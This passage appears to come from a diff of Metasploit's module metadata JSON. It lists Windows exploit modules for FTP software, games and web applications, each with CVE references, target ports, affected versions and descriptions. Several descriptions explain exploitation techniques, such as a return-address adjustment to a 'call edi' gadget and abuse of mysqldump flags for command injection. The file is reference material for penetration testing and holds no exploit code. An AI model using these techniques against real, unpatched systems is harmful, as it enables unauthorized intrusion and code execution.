Exploitation\n also leaves the service in a non-functional state.", - "references": [ - "CVE-2004-2111", - "OSVDB-3713", - "BID-9483" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 SP0-4 EN", - "Windows XP SP0-1 EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/servu_chmod.rb", - "is_install_path": true, - "ref_name": "windows/ftp/servu_chmod", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/servu_mdtm": { - "name": "Serv-U FTPD MDTM Overflow", - "fullname": "exploit/windows/ftp/servu_mdtm", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-02-26", - "type": "exploit", - "author": [ - "spoonm " - ], - "description": "This is an exploit for the Serv-U\\'s MDTM command timezone\n overflow. It has been heavily tested against versions\n 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n nt4/2k/xp/2k3. I have also had success against version 3,\n but only tested 1 version/os. The bug is in all versions\n prior to 5.0.0.4, but this exploit will not work against\n versions not listed above. 
You only get one shot, but it\n should be OS/SP independent.\n\n This exploit is a single hit, the service dies after the\n shellcode finishes execution.", - "references": [ - "CVE-2004-0330", - "OSVDB-4073", - "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html", - "BID-9751" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Serv-U Uber-Leet Universal ServUDaemon.exe", - "Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe", - "Serv-U 5.0.0.0 ServUDaemon.exe" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/ftp/servu_mdtm.rb", - "is_install_path": true, - "ref_name": "windows/ftp/servu_mdtm", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/slimftpd_list_concat": { - "name": "SlimFTPd LIST Concatenation Overflow", - "fullname": "exploit/windows/ftp/slimftpd_list_concat", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-07-21", - "type": "exploit", - "author": [ - "Fairuzan Roslan " - ], - "description": "This module exploits a stack buffer overflow in the SlimFTPd\n server. The flaw is triggered when a LIST command is\n received with an overly-long argument. 
This vulnerability\n affects all versions of SlimFTPd prior to 3.16 and was\n discovered by Raphael Rigo.", - "references": [ - "CVE-2005-2373", - "OSVDB-18172", - "BID-14339" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "SlimFTPd Server <= 3.16 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/slimftpd_list_concat.rb", - "is_install_path": true, - "ref_name": "windows/ftp/slimftpd_list_concat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/trellian_client_pasv": { - "name": "Trellian FTP Client 3.01 PASV Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/trellian_client_pasv", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-04-11", - "type": "exploit", - "author": [ - "zombiefx", - "dookie" - ], - "description": "This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n through an excessively long PASV message.", - "references": [ - "CVE-2010-1465", - "OSVDB-63812", - "EDB-12152" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/trellian_client_pasv.rb", - "is_install_path": true, - "ref_name": "windows/ftp/trellian_client_pasv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/turboftp_port": { - "name": "Turbo FTP Server 1.30.823 PORT Overflow", - "fullname": "exploit/windows/ftp/turboftp_port", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-10-03", - "type": "exploit", - "author": [ - "Zhao Liang", - "Lincoln", - 
"corelanc0d3r", - "thelightcosine" - ], - "description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.", - "references": [ - "EDB-22161", - "OSVDB-85887" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows Universal TurboFtp 1.30.823", - "Windows Universal TurboFtp 1.30.826" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/turboftp_port.rb", - "is_install_path": true, - "ref_name": "windows/ftp/turboftp_port", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/vermillion_ftpd_port": { - "name": "Vermillion FTP Daemon PORT Command Memory Corruption", - "fullname": "exploit/windows/ftp/vermillion_ftpd_port", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-09-23", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. 
If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.", - "references": [ - "OSVDB-62163", - "EDB-11293" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic Targeting", - "vftpd 1.31 - Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb", - "is_install_path": true, - "ref_name": "windows/ftp/vermillion_ftpd_port", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/warftpd_165_pass": { - "name": "War-FTPD 1.65 Password Overflow", - "fullname": "exploit/windows/ftp/warftpd_165_pass", - "aliases": [], - "rank": 200, - "disclosure_date": "1998-03-19", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits the buffer overflow found in the PASS command\n in War-FTPD 1.65. This particular module will only work\n reliably against Windows 2000 targets. The server must be\n configured to allow anonymous logins for this exploit to\n succeed. 
A failed attempt will bring down the service\n completely.", - "references": [ - "CVE-1999-0256", - "OSVDB-875", - "BID-10078" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/warftpd_165_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/warftpd_165_pass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/warftpd_165_user": { - "name": "War-FTPD 1.65 Username Overflow", - "fullname": "exploit/windows/ftp/warftpd_165_user", - "aliases": [], - "rank": 200, - "disclosure_date": "1998-03-19", - "type": "exploit", - "author": [ - "Fairuzan Roslan " - ], - "description": "This module exploits a buffer overflow found in the USER command\n of War-FTPD 1.65.", - "references": [ - "CVE-1999-0256", - "OSVDB-875", - "BID-10078" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows 2000 SP0-SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/warftpd_165_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/warftpd_165_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wftpd_size": { - "name": "Texas Imperial Software WFTPD 3.23 SIZE Overflow", - "fullname": "exploit/windows/ftp/wftpd_size", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-08-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer 
overflow in the SIZE verb in\n Texas Imperial's Software WFTPD 3.23.", - "references": [ - "CVE-2006-4318", - "OSVDB-28134", - "BID-19617" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP1 English", - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/wftpd_size.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wftpd_size", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/winaxe_server_ready": { - "name": "WinaXe 7.7 FTP Client Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/winaxe_server_ready", - "aliases": [], - "rank": 400, - "disclosure_date": "2016-11-03", - "type": "exploit", - "author": [ - "Chris Higgins", - "hyp3rlix" - ], - "description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.", - "references": [ - "EDB-40693", - "URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb", - "is_install_path": true, - "ref_name": "windows/ftp/winaxe_server_ready", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wing_ftp_admin_exec": { - "name": "Wing FTP Server Authenticated Command Execution", - "fullname": "exploit/windows/ftp/wing_ftp_admin_exec", - "aliases": [], 
- "rank": 600, - "disclosure_date": "2014-06-19", - "type": "exploit", - "author": [ - "Nicholas Nam ", - "Imran E. Dawoodjee " - ], - "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.", - "references": [ - "URL-http://www.wftpserver.com", - "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5466, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Wing FTP Server >= 3.0.0" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wing_ftp_admin_exec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wsftp_server_503_mkd": { - "name": "WS-FTP Server 5.03 MKD Overflow", - "fullname": "exploit/windows/ftp/wsftp_server_503_mkd", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-11-29", - "type": "exploit", - "author": [ - "et ", - "Reed Arvin " - ], - "description": "This module exploits the buffer overflow found in the MKD\n command in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n Arvin.", - "references": [ - "CVE-2004-1135", - "OSVDB-12509", - "BID-11772" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "WS-FTP Server 5.03 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb", - "is_install_path": true, - "ref_name": 
"windows/ftp/wsftp_server_503_mkd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wsftp_server_505_xmd5": { - "name": "Ipswitch WS_FTP Server 5.05 XMD5 Overflow", - "fullname": "exploit/windows/ftp/wsftp_server_505_xmd5", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-09-14", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the XMD5 verb in\n IPSWITCH WS_FTP Server 5.05.", - "references": [ - "CVE-2006-4847", - "OSVDB-28939", - "BID-20076" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wsftp_server_505_xmd5", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/xftp_client_pwd": { - "name": "Xftp FTP Client 3.0 PWD Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/xftp_client_pwd", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-04-22", - "type": "exploit", - "author": [ - "zombiefx", - "dookie" - ], - "description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.", - "references": [ - "OSVDB-63968", - "EDB-12332" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb", - "is_install_path": true, - 
"ref_name": "windows/ftp/xftp_client_pwd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/xlink_client": { - "name": "Xlink FTP Client Buffer Overflow", - "fullname": "exploit/windows/ftp/xlink_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Xlink FTP Client 32\n Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP server response is received by a client,\n arbitrary code may be executed.", - "references": [ - "CVE-2006-5792", - "OSVDB-33969", - "URL-http://www.xlink.com" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP3 English", - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/xlink_client.rb", - "is_install_path": true, - "ref_name": "windows/ftp/xlink_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/xlink_server": { - "name": "Xlink FTP Server Buffer Overflow", - "fullname": "exploit/windows/ftp/xlink_server", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Xlink FTP Server\n that comes bundled with Omni-NFS Enterprise 5.2.\n When a overly long FTP request is sent to the server,\n arbitrary code may be executed.", - "references": [ - "CVE-2006-5792", - "OSVDB-58646", - "URL-http://www.xlink.com" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - 
"Omni-NFS Enterprise V5.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/xlink_server.rb", - "is_install_path": true, - "ref_name": "windows/ftp/xlink_server", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/games/mohaa_getinfo": { - "name": "Medal of Honor Allied Assault getinfo Stack Buffer Overflow", - "fullname": "exploit/windows/games/mohaa_getinfo", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-07-17", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits a stack based buffer overflow in the getinfo\n command of Medal Of Honor Allied Assault.", - "references": [ - "CVE-2004-0735", - "OSVDB-8061", - "EDB-357", - "BID-10743" - ], - "platform": "Windows", - "arch": "", - "rport": 12203, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Medal Of Honor Allied Assault v 1.0 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/games/mohaa_getinfo.rb", - "is_install_path": true, - "ref_name": "windows/games/mohaa_getinfo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/games/racer_503beta5": { - "name": "Racer v0.5.3 Beta 5 Buffer Overflow", - "fullname": "exploit/windows/games/racer_503beta5", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-08-10", - "type": "exploit", - "author": [ - "Trancek " - ], - "description": "This module exploits the Racer Car and Racing Simulator game\n versions v0.5.3 beta 5 and earlier. Both the client and server listen\n on UDP port 26000. 
By sending an overly long buffer we are able to\n execute arbitrary code remotely.", - "references": [ - "CVE-2007-4370", - "OSVDB-39601", - "EDB-4283", - "BID-25297" - ], - "platform": "Windows", - "arch": "", - "rport": 26000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Fmodex.dll - Universal", - "Win XP SP2 English", - "Win XP SP2 Spanish" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/games/racer_503beta5.rb", - "is_install_path": true, - "ref_name": "windows/games/racer_503beta5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/games/ut2004_secure": { - "name": "Unreal Tournament 2004 \"secure\" Overflow (Win32)", - "fullname": "exploit/windows/games/ut2004_secure", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-06-18", - "type": "exploit", - "author": [ - "stinko " - ], - "description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.", - "references": [ - "CVE-2004-0608", - "OSVDB-7217", - "BID-10570" - ], - "platform": "Windows", - "arch": "", - "rport": 7787, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "UT2004 Build 3186" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/games/ut2004_secure.rb", - "is_install_path": true, - "ref_name": "windows/games/ut2004_secure", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/http/adobe_robohelper_authbypass": { - "name": "Adobe RoboHelp Server 8 Arbitrary File Upload and Execute", - "fullname": "exploit/windows/http/adobe_robohelper_authbypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability which\n allows remote attackers to upload and execute arbitrary code.", - "references": [ - "CVE-2009-3068", - "OSVDB-57896", - "URL-http://www.intevydis.com/blog/?p=69", - "ZDI-09-066" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/adobe_robohelper_authbypass.rb", - "is_install_path": true, - "ref_name": "windows/http/adobe_robohelper_authbypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/advantech_iview_networkservlet_cmd_inject": { - "name": "Advantech iView NetworkServlet Command Injection", - "fullname": "exploit/windows/http/advantech_iview_networkservlet_cmd_inject", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-06-28", - "type": "exploit", - "author": [ - "rgod", - "y4er", - "Shelby Pace" - ], - "description": "Versions of Advantech iView software below `5.7.04.6469` are\n vulnerable to an unauthenticated command injection vulnerability\n via the `NetworkServlet` endpoint.\n The database backup functionality passes a user-controlled parameter,\n `backup_file` to the `mysqldump` command. 
The sanitization functionality only\n tests for SQL injection attempts and directory traversal, so leveraging the\n `-r` and `-w` `mysqldump` flags permits exploitation.\n The command injection vulnerability is used to write a payload on the target\n and achieve remote code execution as NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/", - "CVE-2022-2143" - ], - "platform": "Windows", - "arch": "x86, x64, cmd", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2022-08-09 16:12:54 +0000", - "path": "/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb", - "is_install_path": true, - "ref_name": "windows/http/advantech_iview_networkservlet_cmd_inject", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/advantech_iview_unauth_rce": { - "name": "Advantech iView Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/http/advantech_iview_unauth_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-02-09", - "type": "exploit", - "author": [ - "wvu ", - "Spencer McIntyre" - ], - "description": "This module exploits an unauthenticated configuration change combined\n with an unauthenticated file write primitive, leading to an arbitrary\n file write that allows for remote code execution as the user running\n iView, which is typically NT AUTHORITY\\SYSTEM.\n\n This issue was demonstrated in the vulnerable version 5.7.02.5992 and\n fixed in version 5.7.03.6112.", - "references": [ - "CVE-2021-22652", 
- "URL-https://www.rapid7.com/blog/post/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/", - "URL-https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/http/advantech_iview_unauth_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/advantech_iview_unauth_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/ajaxpro_deserialization_rce": { - "name": "AjaxPro Deserialization Remote Code Execution", - "fullname": "exploit/windows/http/ajaxpro_deserialization_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-12-03", - "type": "exploit", - "author": [ - "Hans-Martin Münch (MOGWAI LABS)", - "Jemmy Wang" - ], - "description": "This module leverages an insecure deserialization of data to get\n remote code execution on the target OS in the context of the user\n running the website which utilized AjaxPro.\n\n To achieve code execution, the module will construct some JSON data\n which will be sent to the target. 
This data will be deserialized by\n the AjaxPro JsonDeserializer and will trigger the execution of the\n payload.\n\n All AjaxPro versions prior to 21.10.30.1 are vulnerable to this\n issue, and a vulnerable method which can be used to trigger the\n deserialization exists in the default AjaxPro namespace.\n\n AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom\n method that accepts a parameter of type that is assignable from\n `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can\n still be exploited.\n\n This module has been tested successfully against official AjaxPro on\n version 7.7.31.1 without any modification, and on version 21.10.30.1\n with a custom vulnerable method added.", - "references": [ - "CVE-2021-23758", - "URL-https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper" - ], - "mod_time": "2023-11-03 00:04:20 +0000", - "path": "/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/ajaxpro_deserialization_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "screen-effects", - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/altn_securitygateway": { - "name": "Alt-N SecurityGateway username Buffer Overflow", - "fullname": "exploit/windows/http/altn_securitygateway", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-06-02", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "Alt-N SecurityGateway is prone to a buffer 
overflow condition. This\n is due to insufficient bounds checking on the \"username\"\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n\n NOTE: This service doesn't restart, you'll only get one shot. However,\n it often survives a successful exploitation attempt.", - "references": [ - "CVE-2008-4193", - "OSVDB-45854", - "BID-29457" - ], - "platform": "Windows", - "arch": "", - "rport": 4000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "SecurityGateway 1.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/altn_securitygateway.rb", - "is_install_path": true, - "ref_name": "windows/http/altn_securitygateway", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/altn_webadmin": { - "name": "Alt-N WebAdmin USER Buffer Overflow", - "fullname": "exploit/windows/http/altn_webadmin", - "aliases": [], - "rank": 200, - "disclosure_date": "2003-06-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. 
Successful exploitation could result in code\n execution with SYSTEM level privileges.", - "references": [ - "CVE-2003-0471", - "OSVDB-2207", - "BID-8024", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=11771" - ], - "platform": "Windows", - "arch": "", - "rport": 1000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "WebAdmin 2.0.4 Universal", - "WebAdmin 2.0.3 Universal", - "WebAdmin 2.0.2 Universal", - "WebAdmin 2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/altn_webadmin.rb", - "is_install_path": true, - "ref_name": "windows/http/altn_webadmin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/amlibweb_webquerydll_app": { - "name": "Amlibweb NetOpacs webquery.dll Stack Buffer Overflow", - "fullname": "exploit/windows/http/amlibweb_webquerydll_app", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-03", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. 
